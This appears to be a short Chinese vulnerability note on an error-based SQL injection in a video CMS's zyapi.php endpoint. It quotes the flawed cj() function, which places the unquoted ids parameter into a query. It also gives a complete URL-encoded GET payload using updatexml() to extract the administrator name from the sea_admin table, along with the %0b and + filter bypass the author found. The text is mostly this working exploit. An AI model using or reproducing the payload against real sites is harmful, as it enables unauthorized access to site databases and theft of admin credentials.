---恢复内容开始---
需要开启/data/admin/isapi.txt ,当里面的数值为1时,就可以报错注入
存在漏洞的页面:zyapi.php
function cj()
{
global $dsql,$rtype,$rpage,$rkey,$rday,$action,$app_apiver,$app_apipagenum,$cfg_basehost,$ids;
$xmla = "<?xml version="1.0" encoding="utf-8"?>";
$xmla .= "<rss version="".$app_apiver."">";
$sql = "select d.*,p.body as v_playdata,p.body1 as v_playdata1,t.tname from sea_data d left join `sea_type` t on t.tid=d.tid left join `sea_playdata` p on p.v_id=d.v_id where d.v_recycled=0 ";
$sql1 = "select count(*) as dd from sea_data where v_recycled=0 ";
if($ids!=""){
$ids = addslashes($ids);
$sql .= " AND d.v_id in (". $ids .")";
$sql1 .= " AND v_id in (". $ids .")";
}
$ids没加引号。get方式
payload:
/zyapi.php?ac=videolist&ids=1%29and%0b1%3D%40%60%27%60%0band%0b%28updatexml%281%2Cconcat%23%0a%281%2C%28select%0b%7Bx+name%7D%0bfrom%0bsea_admin%29%29%2C1%29%29and%0b1%3D%40%60%27%60%0band%0b%280.1%3D0.1
入库以后有句话,可把我难受死了,最后用+和%0b 来绕过。折腾了好久,下次要记住了。
if(!m_eregi("limit",$sql)) $this->SetQuery(m_eregi_replace("[,;]$",'',trim($sql))." limit 0,1;");
---恢复内容结束---